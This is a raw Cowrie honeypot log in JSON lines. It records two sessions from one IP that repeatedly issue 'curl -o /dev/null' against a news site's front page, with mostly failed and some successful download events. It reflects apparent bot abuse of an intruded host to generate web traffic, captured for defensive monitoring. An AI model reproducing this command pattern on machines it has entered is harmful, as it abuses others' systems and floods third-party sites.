{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.577367Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.578171Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.588341Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.595198Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.623540Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.624783Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.627446Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.630097Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.633712Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.635116Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.670142Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.671710Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.692871Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.693911Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.697008Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.698151Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.708302Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.713250Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.732768Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.733991Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.739527Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.740719Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.769814Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.771116Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.775130Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.780015Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.781193Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.810525Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.812788Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.814461Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.815612Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.825942Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.827100Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.853751Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.855162Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.865043Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.866297Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.886906Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.889682Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.895652Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.896887Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.906443Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.907725Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.930951Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.931789Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.942714Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.944803Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.947004Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.948342Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:19.978715Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.980094Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:19.984510Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.007157Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.008548Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.038639Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.041684Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.042933Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.087202Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.088616Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.094578Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.123285Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.124476Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.140970Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.156141Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.157315Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.167239Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.173374Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.174510Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.192412Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.194484Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.224996Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.226360Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.235356Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.237008Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.285238Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.287289Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.341394Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.342878Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.369331Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.371606Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.380836Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.382201Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.384209Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.443597Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.444839Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.469295Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.490194Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.491928Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.569563Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.571389Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.582795Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.584158Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.586635Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.587501Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.607947Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.609548Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.629863Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.631218Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.634173Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.635377Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.648567Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.671809Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.673850Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.675071Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.691872Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.693511Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.708784Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.728119Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.729552Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.734209Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.766607Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.784960Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.800948Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.802222Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.810824Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.820269Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.821627Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.846481Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.848349Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.860221Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.861310Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.870202Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.871272Z","src_ip":"212.227.125.160","session":"7541ed730449"}
